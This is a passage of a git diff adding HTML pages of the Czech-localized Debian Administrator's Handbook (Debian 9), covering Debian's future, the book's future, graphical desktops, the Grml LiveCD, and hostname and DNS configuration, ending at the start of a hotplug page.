+        rel="next"
+        href="sect.future-of-this-book.html"
+        title="16.3. Future of this Book" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.future-of-debian.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="conclusion.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.future-of-this-book.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.future-of-debian"></a>16.2. Debian's Future</h2></div></div></div><div
+          class="para">
+			In addition to these internal developments, one can reasonably expect new Debian-based distributions to come to light, as many tools keep making this task easier. New specialized subprojects will also be started, in order to widen Debian's reach to new horizons.
+		</div><div
+          class="para">
+			The Debian user community will increase, and new contributors will join the project… including, maybe, you!
+		</div><div
+          class="para">
+			The Debian project is stronger than ever, and well on its way towards its goal of a universal distribution; the inside joke within the Debian community is about <span
+            class="foreignphrase"><em
+              class="foreignphrase">World Domination</em></span>.
+		</div><div
+          class="para">
+			In spite of its old age and its respectable size, Debian keeps on growing in all kinds of (sometimes unexpected) directions. Contributors are teeming with ideas, and discussions on development mailing lists, even when they look like bickerings, keep increasing the momentum. Debian is sometimes compared to a black hole, of such density that any new free software project is attracted.
+		</div><div
+          class="para">
+			Beyond the apparent satisfaction of most Debian users, a deep trend is becoming more and more indisputable: people are increasingly realising that collaborating, rather than working alone in their corner, leads to better results for everyone. Such is the rationale used by distributions merging into Debian by way of subprojects.
+		</div><div
+          class="para">
+			The Debian project is therefore not threatened by extinction…
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="conclusion.html"><strong>Předcházející</strong>Kapitola 16. Conclusion: Debian's Future</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.future-of-this-book.html"><strong>Další</strong>16.3. Future of this Book</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-this-book.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-this-book.html
new file mode 100644
index 000000000..ecd6943a0
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-this-book.html
@@ -0,0 +1,109 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">16.3. Future of this Book</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Future, Improvements, Opinions" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="conclusion.html"
+        title="Kapitola 16. Conclusion: Debian's Future" /><link
+        rel="prev"
+        href="sect.future-of-debian.html"
+        title="16.2. Debian's Future" /><link
+        rel="next"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.future-of-this-book.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.future-of-debian.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="derivative-distributions.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.future-of-this-book"></a>16.3. Future of this Book</h2></div></div></div><div
+          class="para">
+			We would like this book to evolve in the spirit of free software. We therefore welcome contributions, remarks, suggestions, and criticism. Please direct them to Raphaël (<code
+            class="email"><a
+              class="email"
+              href="mailto:hertzog@debian.org">hertzog@debian.org</a></code>) or Roland (<code
+            class="email"><a
+              class="email"
+              href="mailto:lolando@debian.org">lolando@debian.org</a></code>). For actionable feedback, feel free to open bug reports against the <code
+            class="literal">debian-handbook</code> Debian package. The website will be used to gather all information relevant to its evolution, and you will find there information on how to contribute, in particular if you want to translate this book to make it available to an even larger public than today. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://debian-handbook.info/">http://debian-handbook.info/</a></div>
+		</div><div
+          class="para">
+			We tried to integrate most of what our experience at Debian taught us, so that anyone can use this distribution and take the best advantage of it as soon as possible. We hope this book contributes to making Debian less confusing and more popular, and we welcome publicity around it!
+		</div><div
+          class="para">
+			We would like to conclude on a personal note. Writing (and translating) this book took a considerable amount of time out of our usual professional activity. Since we are both freelance consultants, any new source of income grants us the freedom to spend more time improving Debian; we hope this book to be successful and to contribute to this. In the meantime, feel free to retain our services! <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.freexian.com">http://www.freexian.com</a></div> <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.gnurandal.com">http://www.gnurandal.com</a></div>
+		</div><div
+          class="para">
+			See you soon!
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.future-of-debian.html"><strong>Předcházející</strong>16.2. Debian's Future</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="derivative-distributions.html"><strong>Další</strong>Příloha A. Derivative Distributions</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.graphical-desktops.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.graphical-desktops.html
new file mode 100644
index 000000000..8eb4a0984
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.graphical-desktops.html
@@ -0,0 +1,192 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.3. Graphical Desktops</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.customizing-graphical-interface.html"
+        title="13.2. Customizing the Graphical Interface" /><link
+        rel="next"
+        href="sect.main-desktop-tools.html"
+        title="13.4. Email" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.graphical-desktops.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.customizing-graphical-interface.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.main-desktop-tools.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.graphical-desktops"></a>13.3. Graphical Desktops</h2></div></div></div><div
+          class="para">
+			The free graphical desktop field is dominated by two large software collections: GNOME and Plasma by KDE. Both of them are very popular. This is rather a rare instance in the free software world; the Apache web server, for instance, has very few peers.
+		</div><a
+          id="id-1.16.6.3"
+          class="indexterm"></a><a
+          id="id-1.16.6.4"
+          class="indexterm"></a><a
+          id="id-1.16.6.5"
+          class="indexterm"></a><a
+          id="id-1.16.6.6"
+          class="indexterm"></a><a
+          id="id-1.16.6.7"
+          class="indexterm"></a><div
+          class="para">
+			This diversity is rooted in history. Plasma (initially only KDE, which is now the name of the community) was the first graphical desktop project, but it chose the Qt graphical toolkit and that choice wasn't acceptable for a large number of developers. Qt was not free software at the time, and GNOME was started based on the GTK+ toolkit. Qt has since become free software, but the projects still evolved in parallel.
+		</div><div
+          class="para">
+			The GNOME and KDE communities still work together: under the FreeDesktop.org umbrella, the projects collaborated in defining standards for interoperability across applications.
+		</div><a
+          id="id-1.16.6.10"
+          class="indexterm"></a><div
+          class="para">
+			Choosing “the best” graphical desktop is a sensitive topic which we prefer to steer clear of. We will merely describe the many possibilities and give a few pointers for further thoughts. The best choice will be the one you make after some experimentation.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.gnome-desktop"></a>13.3.1. GNOME</h3></div></div></div><div
+            class="para">
+				Debian <span
+              class="distribution distribution">Stretch</span> includes GNOME version 3.22, which can be installed by a simple <code
+              class="command">apt install gnome</code> (it can also be installed by selecting the “Debian desktop environment” task).
+			</div><a
+            id="id-1.16.6.12.3"
+            class="indexterm"></a><div
+            class="para">
+				GNOME is noteworthy for its efforts in usability and accessibility. Design professionals have been involved in writing its standards and recommendations, which has helped developers to create satisfying graphical user interfaces. The project also gets encouragement from the big players of computing, such as Intel, IBM, Oracle, Novell, and of course, various Linux distributions. Finally, many programming languages can be used in developing applications interfacing to GNOME.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.6.12.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/gnome.png"
+                  alt="The GNOME desktop" /></div></div><p
+              class="title"><strong>Obrázek 13.1. The GNOME desktop</strong></p></div><div
+            class="para">
+				For administrators, GNOME seems to be better prepared for massive deployments. Application configuration is handled through the GSettings interface and stores its data in the DConf database. The configuration settings can thus be queried and edited with the <code
+              class="command">gsettings</code>, and <code
+              class="command">dconf</code> command-line tools, or by the <code
+              class="command">dconf-editor</code> graphical user interfaces. The administrator can therefore change users' configuration with a simple script. The GNOME website provides information to guide administrators who manage GNOME workstations: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://help.gnome.org/admin/">https://help.gnome.org/admin/</a></div>
+			</div><a
+            id="id-1.16.6.12.7"
+            class="indexterm"></a><a
+            id="id-1.16.6.12.8"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.6.13"></a>13.3.2. KDE and Plasma</h3></div></div></div><div
+            class="para">
+				Debian <span
+              class="distribution distribution">Stretch</span> includes version 5.8 of KDE Plasma, which can be installed with <code
+              class="command">apt install kde-standard</code>.
+			</div><div
+            class="para">
+				Plasma has had a rapid evolution based on a very hands-on approach. Its authors quickly got very good results, which allowed them to grow a large user-base. These factors contributed to the overall project quality. Plasma is a mature desktop environment with a wide range of applications.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.6.13.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/kde.png"
+                  alt="The Plasma desktop" /></div></div><p
+              class="title"><strong>Obrázek 13.2. The Plasma desktop</strong></p></div><div
+            class="para">
+				Since the Qt 4.0 release, the last remaining license problem with KDE software has been solved. This version was released under the GPL both for Linux and Windows (the Windows version was previously released under a non-free license). KDE applications are primarily developed using the C++ language.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.6.14"></a>13.3.3. Xfce and Others</h3></div></div></div><div
+            class="para">
+				Xfce is a simple and lightweight graphical desktop, which is a perfect match for computers with limited resources. It can be installed with <code
+              class="command">apt install xfce4</code>. Like GNOME, Xfce is based on the GTK+ toolkit, and several components are common across both desktops.
+			</div><a
+            id="id-1.16.6.14.3"
+            class="indexterm"></a><div
+            class="para">
+				Unlike GNOME and Plasma, Xfce does not aim to become a vast project. Beyond the basic components of a modern desktop (file manager, window manager, session manager, a panel for application launchers and so on), it only provides a few specific applications: a terminal, a calendar (Orage), an image viewer, a CD/DVD burning tool, a media player (Parole), sound volume control and a text editor (mousepad).
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.6.14.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/xfce.png"
+                  alt="The Xfce desktop" /></div></div><p
+              class="title"><strong>Obrázek 13.3. The Xfce desktop</strong></p></div><div
+            class="para">
+				Another desktop environment provided in <span
+              class="distribution distribution">Stretch</span> is LXDE, which focuses on the “lightweight” aspect. It can be installed with the <span
+              class="pkg pkg">lxde</span> meta-package.
+			</div><a
+            id="id-1.16.6.14.7"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.customizing-graphical-interface.html"><strong>Předcházející</strong>13.2. Customizing the Graphical Interface</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.main-desktop-tools.html"><strong>Další</strong>13.4. Email</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.grml.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.grml.html
new file mode 100644
index 000000000..056d2c897
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.grml.html
@@ -0,0 +1,89 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.6. Grml</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.aptosid.html"
+        title="A.5. Aptosid and Siduction" /><link
+        rel="next"
+        href="sect.tails.html"
+        title="A.7. Tails" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.grml.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.aptosid.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.tails.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.grml"></a>A.6. Grml</h2></div></div></div><a
+          id="id-1.20.9.2"
+          class="indexterm"></a><div
+          class="para">
+			Grml is a LiveCD with many tools for system administrators, dealing with installation, deployment, and system rescue. The LiveCD is provided in two flavors, <code
+            class="literal">full</code> and <code
+            class="literal">small</code>, both available for 32-bit and 64-bit PCs. Obviously, the two flavors differ by the amount of software included and by the resulting size. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://grml.org">https://grml.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.aptosid.html"><strong>Předcházející</strong>A.5. Aptosid and Siduction</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.tails.html"><strong>Další</strong>A.7. Tails</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.hostname-name-service.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.hostname-name-service.html
new file mode 100644
index 000000000..44d17a14b
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.hostname-name-service.html
@@ -0,0 +1,232 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.3. Setting the Hostname and Configuring the Name Service</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.network-config.html"
+        title="8.2. Configuring the Network" /><link
+        rel="next"
+        href="sect.user-group-databases.html"
+        title="8.4. User and Group Databases" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.hostname-name-service.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.network-config.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.user-group-databases.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.hostname-name-service"></a>8.3. Setting the Hostname and Configuring the Name Service</h2></div></div></div><a
+          id="id-1.11.7.2"
+          class="indexterm"></a><a
+          id="id-1.11.7.3"
+          class="indexterm"></a><div
+          class="para">
+			The purpose of assigning names to IP numbers is to make them easier for people to remember. In reality, an IP address identifies a network interface associated with a device such as a network card. Since each machine can have several network cards, and several interfaces on each card, one single computer can have several names in the domain name system.
+		</div><div
+          class="para">
+			Each machine is, however, identified by a main (or “canonical”) name, stored in the <code
+            class="filename">/etc/hostname</code> file and communicated to the Linux kernel by initialization scripts through the <code
+            class="command">hostname</code> command. The current value is available in a virtual filesystem, and you can get it with the <code
+            class="command">cat /proc/sys/kernel/hostname</code> command.
+		</div><a
+          id="id-1.11.7.6"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> <code
+                      class="filename">/proc/</code> and <code
+                      class="filename">/sys/</code>, virtual filesystems</strong></p></div></div></div><a
+            id="id-1.11.7.7.2"
+            class="indexterm"></a><a
+            id="id-1.11.7.7.3"
+            class="indexterm"></a><a
+            id="id-1.11.7.7.4"
+            class="indexterm"></a><a
+            id="id-1.11.7.7.5"
+            class="indexterm"></a><div
+            class="para">
+			The <code
+              class="filename">/proc/</code> and <code
+              class="filename">/sys/</code> file trees are generated by “virtual” filesystems. This is a practical means of recovering information from the kernel (by listing virtual files) and communicating them to it (by writing to virtual files).
+		</div><div
+            class="para">
+			<code
+              class="filename">/sys/</code> in particular is designed to provide access to internal kernel objects, especially those representing the various devices in the system. The kernel can, thus, share various pieces of information: the status of each device (for example, if it is in energy saving mode), whether it is a removable device, etc. Note that <code
+              class="filename">/sys/</code> has only existed since kernel version 2.6.
+		</div></div><div
+          class="para">
+			Surprisingly, the domain name is not managed in the same way, but comes from the complete name of the machine, acquired through name resolution. You can change it in the <code
+            class="filename">/etc/hosts</code> file; simply write a complete name for the machine there at the beginning of the list of names associated with the address of the machine, as in the following example:
+		</div><div
+          class="informalexample"><pre
+            class="programlisting">
+127.0.0.1     localhost
+192.168.0.1   arrakis.falcot.com arrakis
+</pre></div><a
+          id="id-1.11.7.10"
+          class="indexterm"></a><a
+          id="id-1.11.7.11"
+          class="indexterm"></a><a
+          id="id-1.11.7.12"
+          class="indexterm"></a><a
+          id="id-1.11.7.13"
+          class="indexterm"></a><a
+          id="id-1.11.7.14"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.name-resolution"></a>8.3.1. Name Resolution</h3></div></div></div><a
+            id="id-1.11.7.15.2"
+            class="indexterm"></a><a
+            id="id-1.11.7.15.3"
+            class="indexterm"></a><div
+            class="para">
+				The mechanism for name resolution in Linux is modular and can use various sources of information declared in the <code
+              class="filename">/etc/nsswitch.conf</code> file. The entry that involves host name resolution is <code
+              class="literal">hosts</code>. By default, it contains <code
+              class="literal">files dns</code>, which means that the system consults the <code
+              class="filename">/etc/hosts</code> file first, then DNS servers. NIS/NIS+ or LDAP servers are other possible sources.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> NSS and DNS</strong></p></div></div></div><div
+              class="para">
+				Be aware that the commands specifically intended to query DNS (especially <code
+                class="command">host</code>) do not use the standard name resolution mechanism (NSS). As a consequence, they do not take into consideration <code
+                class="filename">/etc/nsswitch.conf</code>, and thus, not <code
+                class="filename">/etc/hosts</code> either.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.dns-server-configuration"></a>8.3.1.1. Configuring DNS Servers</h4></div></div></div><a
+              id="id-1.11.7.15.6.2"
+              class="indexterm"></a><a
+              id="id-1.11.7.15.6.3"
+              class="indexterm"></a><div
+              class="para">
+					DNS (Domain Name Service) is a distributed and hierarchical service mapping names to IP addresses, and vice-versa. Specifically, it can turn a human-friendly name such as <code
+                class="literal">www.eyrolles.com</code> into the actual IP address, <code
+                class="literal">213.244.11.247</code>.
+				</div><div
+              class="para">
+					To access DNS information, a DNS server must be available to relay requests. Falcot Corp has its own, but an individual user is more likely to use the DNS servers provided by their ISP.
+				</div><a
+              id="id-1.11.7.15.6.6"
+              class="indexterm"></a><a
+              id="id-1.11.7.15.6.7"
+              class="indexterm"></a><div
+              class="para">
+					The DNS servers to be used are indicated in the <code
+                class="filename">/etc/resolv.conf</code>, one per line, with the <code
+                class="literal">nameserver</code> keyword preceding an IP address, as in the following example:
+				</div><pre
+              class="programlisting">
+nameserver 212.27.32.176
+nameserver 212.27.32.177
+nameserver 8.8.8.8
+</pre><div
+              class="para">
+					Note that the <code
+                class="filename">/etc/resolv.conf</code> file may be handled automatically (and overwritten) when the network is managed by NetworkManager or configured via DHCP.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.etc-hosts"></a>8.3.1.2. The <code
+                      class="filename">/etc/hosts</code> file</h4></div></div></div><a
+              id="id-1.11.7.15.7.2"
+              class="indexterm"></a><a
+              id="id-1.11.7.15.7.3"
+              class="indexterm"></a><div
+              class="para">
+					If there is no name server on the local network, it is still possible to establish a small table mapping IP addresses and machine hostnames in the <code
+                class="filename">/etc/hosts</code> file, usually reserved for local network stations. The syntax of this file is very simple: each line indicates a specific IP address followed by the list of any associated names (the first being “completely qualified”, meaning it includes the domain name).
+				</div><div
+              class="para">
+					This file is available even during network outages or when DNS servers are unreachable, but will only really be useful when duplicated on all the machines on the network. The slightest alteration in correspondence will require the file to be updated everywhere. This is why <code
+                class="filename">/etc/hosts</code> generally only contains the most important entries.
+				</div><div
+              class="para">
+					This file will be sufficient for a small network not connected to the Internet, but with 5 machines or more, it is recommended to install a proper DNS server.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Bypassing DNS</strong></p></div></div></div><div
+                class="para">
+					Since applications check the <code
+                  class="filename">/etc/hosts</code> file before querying DNS, it is possible to include information in there that is different from what the DNS would return, and therefore to bypass normal DNS-based name resolution.
+				</div><div
+                class="para">
+					This allows, in the event of DNS changes not yet propagated, to test access to a website with the intended name even if this name is not properly mapped to the correct IP address yet.
+				</div><div
+                class="para">
+					Another possible use is to redirect traffic intended for a specific host to the localhost, thus preventing any communication with the given host. For example, hostnames of servers dedicated to serving ads could be diverted which would bypass these ads resulting in more fluid, less distracting, navigation.
+				</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.network-config.html"><strong>Předcházející</strong>8.2. Configuring the Network</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.user-group-databases.html"><strong>Další</strong>8.4. User and Group Databases</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.hotplug.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.hotplug.html
new file mode 100644
index 000000000..6908ab59c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.hotplug.html
@@ -0,0 +1,394 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.11. Hot Plugging: hotplug</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
